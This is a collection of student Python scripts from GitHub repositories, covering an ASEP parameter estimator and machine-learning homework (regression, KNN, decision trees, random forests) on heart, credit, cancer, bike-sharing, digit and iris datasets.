"alphanum_fraction": 0.5642823576927185, "avg_line_length": 27.50666618347168, "blob_id": "eaaaef8435c8c0e5038c88c50624843954c974fa", "content_id": "b0ecd76e04774ef7de73eaa3a3ee58698a208a83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2139, "license_type": "no_license", "max_line_length": 107, "num_lines": 75, "path": "/simple_estimate_mu.py", "repo_name": "shimagaki/ASEP_inverseASEP", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*- \nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"periodic boundary condition\"\"\"\nK = 10; L = 15; sample_size = 10000 \n\n#-------- given Data ---------#\ndata_vacancy = []; data_location = [] \nconjugat_mu = []; mu_tru = np.zeros(K)\n\n#-------- parameter ---------#\nmu_model = np.zeros(K) \n\ndef read_data_file():\n global data_vacancy,data_location, mu_tru\n\n fname_vacancy = \"simple_vacancy_K\"+str(K)+\"_L\"+str(L)+\"_N\"+str(sample_size)+\"_every_T1step.dat\"\n fname_trans_coeff = \"simple_trans_coeff_K\"+str(K)+\"_L\"+str(L)+\"_N\"+str(sample_size)+\"_every_T1step.dat\"\n\n f_vacancy = open(fname_vacancy,\"r\")\n f_trans_coeff = open(fname_trans_coeff,\"r\")\n \n #----------- mu_tru -----------#\n coeff_line = f_trans_coeff.readlines()\n coeff_line = np.copy( coeff_line[0].split(\" \") )\n mu_tru = np.copy(map(float, coeff_line[:K]))\n\n #----------- data_vacancy -----------#\n i = 0\n for line in f_vacancy:\n item = line.split(' ')\n del item[-1]\n\n vacancy_single_sample = np.copy(map(int,item) ) \n if(i==0):\n data_vacancy = vacancy_single_sample\n if(i==1):\n data_vacancy = np.append([np.copy(data_vacancy)],[vacancy_single_sample],axis = 0)\n if(i>1):\n data_vacancy = np.append(np.copy(data_vacancy),[vacancy_single_sample],axis = 0)\n i += 1\n \n f_vacancy.close()\n f_trans_coeff.close()\n\ndef calc_mu_model():\n global data_vacancy, mu_model\n \n for k in range(sample_size):\n mu_model = mu_model + data_vacancy[k]\n mu_model = mu_model / float(sample_size)\n\ndef plot_model_and_true(mu_tru,mu_model):\n x = np.linspace(0,0.4,100)\n y = np.linspace(0,0.4,100)\n plt.plot(x,y)\n plt.scatter(mu_tru,mu_model)\n plt.xlabel(\"true parameter\")\n plt.ylabel(\"model parameter\")\n \n plt.grid(True)\n plt.show()\n\nif __name__ == \"__main__\":\n read_data_file()\n calc_mu_model()\n \n mu_model = np.copy(mu_model) / np.sum(mu_model)\n \n print \"\\n\"\n print \"mu_tru=\\n\", mu_tru\n print \"mu_model/sum(abs(mu_model)=\\n\",mu_model\n \n plot_model_and_true(mu_tru,mu_model) \n" } ]
3
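cyclic_ASEP.update above hops particle i one site to the right with probability mu[i] whenever the gap in front of it is non-empty, shrinking that gap and growing the one behind. The same bookkeeping on plain lists, with toy values for K, L, the positions, gaps, and rates:

import random

K, L = 3, 6
x = [0, 2, 4]          # particle positions on the ring (toy state)
n = [1, 1, 1]          # vacancies ahead of each particle
mu = [0.5, 0.3, 0.2]   # normalized hop rates (made up)

for i in range(K):
    if n[i] > 0 and random.random() < mu[i]:
        x[i] = (x[i] + 1) % L   # hop right
        n[i] -= 1               # gap ahead shrinks
        n[(i - 1) % K] += 1     # gap ahead of the previous particle grows
print(x, n)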
VrezhKhalatyan/DataScience-Advanced_Machine_Learning
https://github.com/VrezhKhalatyan/DataScience-Advanced_Machine_Learning
fcafa3254626f81be03cf13524717ccdb365ac51
f200f48ba548cc8b49609d40d3d561da34fd6a90
7897fcea77a23841627229af378a981c405a8e44
refs/heads/master
2020-04-11T19:49:15.153335
2019-08-13T21:50:19
2019-08-13T21:50:19
162,048,186
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6965453028678894, "alphanum_fraction": 0.7086834907531738, "avg_line_length": 22.785184860229492, "blob_id": "d9f4bf3a00be6b699544a40b8542d494996156f7", "content_id": "9938c87b5b7db89183f7bb3e96dec7e10f558dc2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3221, "license_type": "no_license", "max_line_length": 230, "num_lines": 135, "path": "/Predict the probability of Heart Disease.py", "repo_name": "VrezhKhalatyan/DataScience-Advanced_Machine_Learning", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[2]:\n\n\n#Vrezh Khalatyan HW4_Question2\nfrom sklearn import preprocessing\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.cluster import KMeans\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\n# In[3]:\n\n\n# reading a CSV file directly from Web (or local drive), and store it in a pandas DataFrame:\n# \"read_csv\" is a pandas function to read csv files from web or local drive:\n\nheart_short_df = pd.read_csv('/Users/anitribunyan/Downloads/HW4/Heart_short.csv')\n\nheart_short_df.head()\n\n\n# In[4]:\n\n\n# Creating the Feature Matrix for iris dataset:\n\n# create a python list of feature names that would like to pick from the dataset:\nfeature_cols = ['Age','RestBP','Chol','RestECG', 'MaxHR', 'Oldpeak']\n\n# use the above list to select the features from the original DataFrame\nX = heart_short_df[feature_cols] \n\n# print the first 5 rows\nX.head()\n\n\n# In[5]:\n\n\n# select a Series of labels (the last column) from the DataFrame\ny = heart_short_df['AHD']\nnormalized = preprocessing.scale(X)\nprint(normalized)\n\n\n# In[6]:\n\n\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, \n random_state=3)\n\n# print the size of the traning set:\nprint(X_train.shape)\nprint(y_train.shape)\n\n# print the size of the testing set:\nprint(X_test.shape)\nprint(y_test.shape)\n\n# \"my_logreg\" is instantiated as an \"object\" of LogisticRegression \"class\". \nmy_logreg = LogisticRegression()\n\n# Training ONLY on the training set:\nmy_logreg.fit(X, y)\n\n# Testing on the testing set:\npredict_lr = my_logreg.predict(X_test)\n\n\n# In[7]:\n\n\nfrom sklearn.metrics import accuracy_score\nscore_lr = accuracy_score(y_test, predict_lr)\n\nprint(\"Prediction Accuracy : \" + str(score_lr))\n\n\n# In[8]:\n\n\n#Use Logistic Regression Classifier to predict the probability of Heart Disease based on the training/testing datasets that you built in part (c) (you have to use “my_logreg.predict_proba” method rather than “my_logreg.predict”). 
\npredict_lr = my_logreg.predict_proba(X_test)\n\nfpr, tpr, thresholds = metrics.roc_curve(y_test, predict_lr[:,1], pos_label='Yes')\n\nprint(fpr)\nprint(tpr)\nprint(\"\\n\")\n# AUC:\nAUC = metrics.auc(fpr, tpr)\nprint(\"AUC : \" + str(AUC))\n\n\n# In[9]:\n\n\n# Importing the \"pyplot\" package of \"matplotlib\" library of python to generate \n# graphs and plot curves:\nimport matplotlib.pyplot as plt\n\n# The following line will tell Jupyter Notebook to keep the figures inside the explorer page \n# rather than openng a new figure window:\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nplt.figure()\n\n# Roc Curve:\nplt.plot(fpr, tpr, color='red', lw=2, \n label='ROC Curve (area = %0.2f)' % AUC)\n\n# Random Guess line:\nplt.plot([0, 1], [0, 1], color='blue', lw=1, linestyle='--')\n\n# Defining The Range of X-Axis and Y-Axis:\nplt.xlim([-0.005, 1.005])\nplt.ylim([0.0, 1.01])\n\n# Labels, Title, Legend:\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('Receiver operating characteristic')\nplt.legend(loc=\"lower right\")\n\nplt.show()\n\n" }, { "alpha_fraction": 0.669618546962738, "alphanum_fraction": 0.7050408720970154, "avg_line_length": 19.661972045898438, "blob_id": "7634808fcd1bb64f7785428373f428a169ec540c", "content_id": "d8da5d17f4d8914541852c693254a7a5d06d0330", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2936, "license_type": "no_license", "max_line_length": 183, "num_lines": 142, "path": "/Debt Prediction.py", "repo_name": "VrezhKhalatyan/DataScience-Advanced_Machine_Learning", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[1]:\n\n\n#Vrezh Khalatyan HW3 Question 2\n# Importing the required packages and libraries\n# we will need numpy and pandas later\nimport numpy as np\nimport pandas as pd\n\n\n# In[2]:\n\n\n#Read Credit csv and assign to Pandas DataFrame\ncredit_df = pd.read_csv('/Users/anitribunyan/Desktop/HW3/Credit.csv')\n\n\n# In[3]:\n\n\n# checking the dataset by printing every 10 lines:\ncredit_df[0::10]\n\n\n# In[4]:\n\n\nfrom sklearn import preprocessing\n# Creating the Feature Matrix:\n\n# create a python list of feature names that would like to pick from the dataset:\nfeature_cols = ['Income', 'Limit', 'Rating', 'Cards', 'Age', 'Education', 'Married']\n\n# use the above list to select the features:\nX = credit_df[feature_cols]\n\n# Another way to do this (notice double bracket!):\nX = credit_df[['Income', 'Limit', 'Rating', 'Cards', 'Age', 'Education', 'Married']]\nX_Norm = preprocessing.scale(X)\n\n# check the size:\nprint(X_Norm.shape)\n\n# show the first 5 rows\nX_Norm[0::10]\n\n\n# In[5]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n# select the target (last column) from the DataFrame\ny = credit_df['Balance']\n\n#Split the dataset into testing and training sets\nX_train, X_test, y_train, y_test = train_test_split(X_Norm, y, test_size=0.24, \n random_state=4)\n\n\n# In[6]:\n\n\nfrom sklearn.linear_model import LinearRegression\n\nlinreg = LinearRegression()\n\n# fitting the model to the training data:\nlinreg.fit(X_train, y_train)\n\n\n# In[15]:\n\n\n# printing Theta0 using attribute \"intercept_\":\nprint(linreg.intercept_)\n\n# printing [Theta1, Theta2, Theta3, Theta4, Theta5, Theta6, Theta7] using attribute \"coef_\":\nprint(linreg.coef_)\n\nprint('\\n')\nprint('The most important coefficient would be the Rating feature with 478.53169403' + '\\n' + 'The least important would be the first feature Income having -264.98372644 ')\n\n\n# 
In[9]:\n\n\n# make predictions on the testing set\ny_prediction = linreg.predict(X_test)\n\nprint(y_prediction)\n\n\n# In[10]:\n\n\nfrom sklearn import metrics\n\n# Calculating \"Mean Square Error\" (MSE):\nmse = metrics.mean_squared_error(y_test, y_prediction)\n\n# Using numpy sqrt function to take the square root and calculate \"Root Mean Square Error\" (RMSE)\nrmse = np.sqrt(mse)\n\nprint(rmse)\n\n\n# In[11]:\n\n\nfrom sklearn.model_selection import cross_val_score\n\n\nmse_list = cross_val_score(linreg, X, y, cv=10, scoring='neg_mean_squared_error')\n\nprint(mse_list)\n\n\n# In[12]:\n\n\n# in order to calculate root mean square error (rmse), we have to make them positive!\nmse_list_positive = -mse_list\n\n# using numpy sqrt function to calculate rmse:\nrmse_list = np.sqrt(mse_list_positive)\nprint(rmse_list)\n\n\n# In[13]:\n\n\n# calculate the average RMSE as final result of cross validation:\nprint(rmse_list.mean())\n\n\n# In[14]:\n\n\nprint('Without the cross_validation, the performance of the regression was 161.51385491175333 and with the' + '\\n' + '10 fold cross validation the performance was 160.33198910744073')\n\n" }, { "alpha_fraction": 0.7139037251472473, "alphanum_fraction": 0.7332887649536133, "avg_line_length": 24.32203483581543, "blob_id": "74bb255083da61edd96092181a068a8cbe8d8af7", "content_id": "3aba81f5524c787b23e3de8c8f49eb00ed00f4bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1496, "license_type": "no_license", "max_line_length": 95, "num_lines": 59, "path": "/Handwriting Recognition using Machine Learning!.py", "repo_name": "VrezhKhalatyan/DataScience-Advanced_Machine_Learning", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[22]:\n\n\n#Vrezh Khalatyan Homework 5\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib.image as mpimg \nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport pathlib\nimport imageio\nfrom IPython.display import Image\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\n\n\n# In[23]:\n\n\n# reading a CSV file directly from Web (or local drive), and store it in a pandas DataFrame:\n# \"read_csv\" is a pandas function to read csv files from web or local drive:\n\nlabel_df = pd.read_csv('/Users/anitribunyan/Desktop/HW5/label.csv')\nlabel_df.head()\n\n\n# In[24]:\n\n\nnumberOfImages = 1797 # number of images\ndataMatrix = np.zeros((numberOfImages, 64))\n\nfor index in range(numberOfImages):\n dataPath = \"/Users/anitribunyan/Desktop/HW5/Digit/{}.jpg\".format(index)\n image = mpimg.imread(dataPath)\n feature = image.reshape(64)\n dataMatrix[index] = np.copy(feature)\n\n\n# In[25]:\n\n\ny = label_df['digit label']\nX = pd.DataFrame.from_records(dataMatrix)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.21, random_state = 2)\nmy_RandomForest = RandomForestClassifier(n_estimators = 19, bootstrap = True, random_state = 3)\nmy_RandomForest.fit(X_train, y_train)\ny_predict = my_RandomForest.predict(X_test)\n\n\n# In[26]:\n\n\naccuracy_r = accuracy_score(y_test, y_predict)\nprint(\"Random_Forest Classifier Accuracy Score: \" + str(accuracy_r))\n\n" }, { "alpha_fraction": 0.7323806285858154, "alphanum_fraction": 0.7388762831687927, "avg_line_length": 31.05208396911621, "blob_id": "23038f95d1fe94e2006fdae08ffaf3f435a8f84b", "content_id": "d906bcf860123f58c939ce8b323e694d96c7ea56", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3079, "license_type": "no_license", "max_line_length": 345, "num_lines": 96, "path": "/VrezhK_Bike_Sharing_Data_Analytics.py", "repo_name": "VrezhKhalatyan/DataScience-Advanced_Machine_Learning", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# # Predicting With Decision_Tree & Cross_Validation\n\n# The goal is to create a model that predicts the value of a target variable by learning simple decision rules inferred from the data features.\n\n# Cross Validation is used to assess the predictive performance of the models and and to judge how they perform outside the sample to a new data set also known as test data.\n# \n# The motivation to use cross validation techniques is that when we fit a model, we are fitting it to a training dataset. Without cross validation we only have information on how does our model perform to our in-sample data. Ideally we would like to see how does the model perform when we have a new data in terms of accuracy of its predictions.\n\n# In[1]:\n\n\n\n# Importing libraries and packages:\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\n# In[2]:\n\n\nbSharing_df = pd.read_csv('/Users/anitribunyan/Downloads/train.csv')\nbSharing_df.head()\n\n\n# In[3]:\n\n\n# create a python list of feature names that would like to pick from the dataset:\nfeature_cols = ['season','holiday',\n 'workingday','weather','temp',\n 'atemp','humidity','windspeed', 'casual', 'registered']\n\n# use the above list to select the features from the original DataFrame\nX = bSharing_df[feature_cols] \n\n# select a Series of labels (the last column) from the DataFrame\ny = bSharing_df['count']\n\n# print the first 5 rows\nprint(X.head())\nprint(y.head())\n\n\n# In[4]:\n\n\nmy_decisionTree = DecisionTreeClassifier()\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, \n random_state=2)\nmy_decisionTree.fit(X_train, y_train)\ny_predict_dt = my_decisionTree.predict(X_test)\nscore_dt = accuracy_score(y_test, y_predict_dt)\n\n\n# function cross_val_score performs Cross Validation:\naccuracy_list = cross_val_score(my_decisionTree, X, y, cv=10, scoring='accuracy')\n\nprint(score_dt)\nprint(accuracy_list)\n\n\n# In[5]:\n\n\n# use average of accuracy values as final result\naccuracy_cv = accuracy_list.mean()\n\nprint(\"Prediction Accuracy Using DecisionTree & Cross_Validation: \" + str(accuracy_cv))\n\n\n# # Predicting With RandomForest Classifier\n\n# In[10]:\n\n\nmy_RandomForest = RandomForestClassifier(n_estimators = 100, bootstrap = True, random_state=3)\nmy_RandomForest.fit(X_train, y_train)\ny_predict_RF = my_RandomForest.predict(X_test)\naccuracy_RF =accuracy_score(y_test, y_predict_RF)\n\n# function cross_val_score performs Cross Validation:\nrf_accuracy_list = cross_val_score(my_decisionTree, X, y, cv=10, scoring='accuracy')\naccuracy_rf = rf_accuracy_list.mean()\n\nprint(\"Prediction Accuracy with RandomForest Using Cross_Validation: \" + str(accuracy_rf))\nprint(\"Prediction Accuracy using only RandomForest Classifier: \" + str(accuracy_RF))\n\n" }, { "alpha_fraction": 0.7278499007225037, "alphanum_fraction": 0.7388167381286621, "avg_line_length": 26.484127044677734, "blob_id": 
"80e362df6935ad6514c688d8930cbbef252405a8", "content_id": "75fa10315f56ef6d832c149fc196db811dda9514", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3469, "license_type": "no_license", "max_line_length": 103, "num_lines": 126, "path": "/Cancer Diagnosis Using Machine Learning.py", "repo_name": "VrezhKhalatyan/DataScience-Advanced_Machine_Learning", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[43]:\n\n\n# Vrezh Khalatyan HW4 Question 1\n# Importing libraries and packages:\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.cluster import KMeans\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\n# In[44]:\n\n\n# reading a CSV file directly from Web (or local drive), and store it in a pandas DataFrame:\n# \"read_csv\" is a pandas function to read csv files from web or local drive:\n\ncancer = pd.read_csv('/Users/anitribunyan/Downloads/HW4/Cancer.csv')\n\ncancer.head()\n\n\n# In[45]:\n\n\n# create a python list of feature names that would like to pick from the dataset:\nfeature_cols = ['Clump_Thickness','Uniformity_of_Cell_Size','Uniformity_of_Cell_Shape',\n 'Marginal_Adhesion','Single_Epithelial_Cell_Size','Bare_Nuclei',\n 'Bland_Chromatin','Normal_Nucleoli','Mitoses']\n\n# use the above list to select the features from the original DataFrame\nX = cancer[feature_cols] \n\n# select a Series of labels (the last column) from the DataFrame\ny = cancer['Malignant_Cancer']\n\n# Randomly splitting the original dataset into training set and testing set:\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.35, random_state=3)\n\n# print the size of the traning set:\nprint(X_train.shape)\nprint(y_train.shape)\n\n# print the size of the testing set:\nprint(X_test.shape)\nprint(y_test.shape)\n\n\n# In[46]:\n\n\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import accuracy_score\n\nmy_DecisionTree = DecisionTreeClassifier(random_state=3)\n\nmy_DecisionTree.fit(X_train, y_train)\n\ny_predict_dt = my_DecisionTree.predict(X_test)\n\nscore_dt = accuracy_score(y_test, y_predict_dt)\n\nprint(\"Decision Tree Accuracy: \" + str(score_dt))\n\n\n# In[47]:\n\n\nfrom sklearn.utils import resample\nfrom sklearn.metrics import accuracy_score\n#from sklearn.ensemble import VotingClassifier\n#perform a new Ensemble Learning method called “Bagging”\npredData = pd.DataFrame()\nfor i in range(19):\n bootstrap_size = int(0.8*len(X_train))\n resample_X_train = resample(X_train, n_samples = bootstrap_size , random_state=i , replace = True)\n resample_y_train = resample(y_train, n_samples = bootstrap_size , random_state=i , replace = True) \n Base_DecisionTree = DecisionTreeClassifier(random_state=3)\n Base_DecisionTree.fit(resample_X_train, resample_y_train)\n predData[str(i)] = Base_DecisionTree.predict(X_test) \n\n\n# In[48]:\n\n\n#Performing voting on prediction results\nsampleSum = pd.Series(predData.sum(axis=1))\npredData = predData.assign(count = sampleSum)\npredAccuracy = []\n\nfor i in range(len(predData)):\n if(sampleSum[i]>= 10):\n predAccuracy.append(1)\n else:\n predAccuracy.append(0)\n \npredData = predData.assign(final = pd.Series(predAccuracy))\n\nscorePredData = accuracy_score(y_test, predData['final'])\nprint(\"Final 
Prediction Score: \" + str(scorePredData))\n\n\n# In[52]:\n\n\nprint(predData)\n\n\n# In[49]:\n\n\nfrom sklearn.ensemble import RandomForestClassifier\nmy_RandomForest = RandomForestClassifier(n_estimators = 19, bootstrap = True, random_state=3)\nmy_RandomForest.fit(X_train, y_train)\ny_predict_rf = my_RandomForest.predict(X_test)\nscore_rf = accuracy_score(y_test, y_predict_rf)\nprint('Random Forest Accuracy:',score_rf)\n\n" }, { "alpha_fraction": 0.6402642726898193, "alphanum_fraction": 0.6529693603515625, "avg_line_length": 29.469026565551758, "blob_id": "b43ef9c5a82c639d84a884b89c90873e78bf5274", "content_id": "ce7f83aa0d26e53e33884a75e163c3f058dd405d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13794, "license_type": "no_license", "max_line_length": 403, "num_lines": 452, "path": "/Decision Tree for Weather Forecasting_KNN Classification in sklearn.py", "repo_name": "VrezhKhalatyan/DataScience-Advanced_Machine_Learning", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[4]:\n\n\n#Question2a\n#a- Read the iris dataset from the following URL:https://raw.githubusercontent.com/mpourhoma/CS4661/master/iris.csvand assign it to a Pandas DataFrame as you learned in tutorial Lab2-3.\n# Import the pandas library\nimport pandas as pd\n# creates a empty dataframe\ndf = pd.DataFrame()\n# reading a CSV file directly from Web, and store it in a pandas DataFrame:\n# \"read_csv\" is a pandas function to read csv files from web or local device:\ndf = pd.read_csv('https://raw.githubusercontent.com/mpourhoma/CS4661/master/iris.csv')\ndf\n\n\n# In[5]:\n\n\n#Question2b\n# Split the dataset into testing and training sets with the following parameters:test_size=0.4, random_state=6\n# Importing the required packages and libraries\nimport numpy as np\n# Randomly splitting the original dataset into training set and testing set\n# The function\"train_test_split\" from \"sklearn.cross_validation\" library performs random splitting.\n# \"test_size=0.4\" means that pick 40% of data samples for testing set, and the rest (60%) for training set.\nfrom sklearn.model_selection import train_test_split\n\n# create a python list of feature names that would like to pick from the dataset:\nfeature_cols = ['sepal_length','sepal_width','petal_length','petal_width']\n# use the above list to select the features from the original DataFrame\nX = df[feature_cols]\n# select a Series of labels (the last column) from the DataFrame\n# y = idf['label'] # this is the index that we gave to the labels\ny = df['species']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\n# printing the size of the training set\nprint(X_train.shape)\nprint(y_train.shape)\n# printing the size of the testing set\nprint(X_test.shape)\nprint(y_test.shape)\n# printing the actual testing set\nprint(X_test)\nprint('\\n')\nprint(y_test)\n\n\n# In[6]:\n\n\n#Question2c\n# Instantiate a KNN object with K=3, train it on the training set and test it on the testing set.Then, calculate the accuracy of your prediction as you learned in Lab3.\n# The following line will import KNeighborsClassifier \"Class\"\n# KNeighborsClassifier is name of a \"sklearn class\" to perform \"KNN Classification\"\n# Importing the required packages and libraries\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.metrics import accuracy_score\n# Instantiating another \"object\" of KNeighborsClassifier \"class\" with k=3:\nk = 3\nknn = 
KNeighborsClassifier(n_neighbors=k)\n# We use the method \"fit\" of the object along with training dataset and labels to train the model.\nknn.fit(X_train, y_train)\n# We use the method \"predict\" of the *trained* object knn on one or more testing data sample to perform prediction:\ny_predict = knn.predict(X_test)\nprint(y_predict)\n# Checking for the results\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n# Printing the results\nprint(results)\n\n\n# In[7]:\n\n\n#Question2d\n#Repeat part (c) for K=1, K=5, K=7, K=11, K=15, K=27, K=59 (you can simply use a “for loop,”and save the final accuracy results in a list). Does the accuracy always get better byincreasing the value K? \nk = 1\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\nprint(results)\nprint('End of prediction with k = 1')\nprint('------------------------------------------------------------------')\n\nk = 5\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\nprint(results)\nprint('End of prediction with k = 5')\nprint('------------------------------------------------------------------')\n\nk = 7\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\nprint(results)\nprint('End of prediction with k = 7')\nprint('------------------------------------------------------------------')\n\nk = 11\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\nprint(results)\nprint('End of prediction with k = 11')\nprint('------------------------------------------------------------------')\n\nk = 15\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\nprint(results)\nprint('End of prediction with k = 15')\nprint('------------------------------------------------------------------')\n\nk = 27\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\nprint(results)\nprint('End of prediction with k = 27')\nprint('------------------------------------------------------------------')\n\nk = 59\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\nprint(results)\nprint('End of prediction with k = 59')\nprint('------------------------------------------------------------------')\n\nprint('The accuracy does not get better as k increases and also not good when k is too small. 
' + '\\n' + 'At k=1, there where 3 mistakes; at k=5, there was 1 mistake; ' + '\\n' + 'at k=7, there was 2 mistakes; at k=11 there where 2 mistakes; ' + '\\n' + 'at k=15, there where 4 mistakes; at k=27, there where 5 mistakes;' + '\\n' + ' and at k=59, there where 11 mistakes.')\n\n\n\n\n# In[8]:\n\n\n#Question2e\n#Prediction on Sepal Length\n# train, test, and evaluate your model 4 times,each time on a dataset including only one of the features, and save the final accuracyresults in a list).\nfeature_cols = ['sepal_length']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracySepalLength = accuracy_score(y_test, y_predict)\n#print(accuracySepalLength)\n\nprint(results)\nprint('------------------------------------------------------------------')\n\n#Prediction on Sepal Width\nfeature_cols = ['sepal_width']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracySepalWidth = accuracy_score(y_test, y_predict)\nprint(results)\nprint('------------------------------------------------------------------')\n\n#Prediction on Petal Length\nfeature_cols = ['petal_length']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracyPetalLength = accuracy_score(y_test, y_predict)\nprint(results)\nprint('------------------------------------------------------------------')\n\n#Prediction on Petal Width\nfeature_cols = ['petal_width']\nX = df[feature_cols]\n#print(X)\ny = df['species']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=6)\nk = 3\nknn = KNeighborsClassifier(n_neighbors=k)\nknn.fit(X_train, y_train)\n\ny_predict = knn.predict(X_test)\nprint(y_predict)\n\nresults = pd.DataFrame()\n\nresults['actual'] = y_test \nresults['prediction'] = y_predict \n\naccuracyPetalWidth = accuracy_score(y_test, y_predict)\nprint(results)\nprint('------------------------------------------------------------------')\n\nprint('Final Results')\nprint('--------------')\nlistOfResults = {'Sepal Length':accuracySepalLength,'Sepal Width':accuracySepalWidth, 'Petal Length': accuracyPetalLength, 'Petal Width':accuracyPetalWidth}\nprint(listOfResults)\n\nprint('The best feature is Petal Width and the second best feature is Petal Length')\n\n\n# In[9]:\n\n\n#Question2f\n#Now, we want to repeat part (e), this time using two features. you have to train, test, andevaluate your model for 6 different cases: using (1st and 2nd features), (1st and 3rdfeatures), (1st and 4th features), (2nd and 3rd features), (2nd and 4th features), (3rd and 4thfeatures)! 
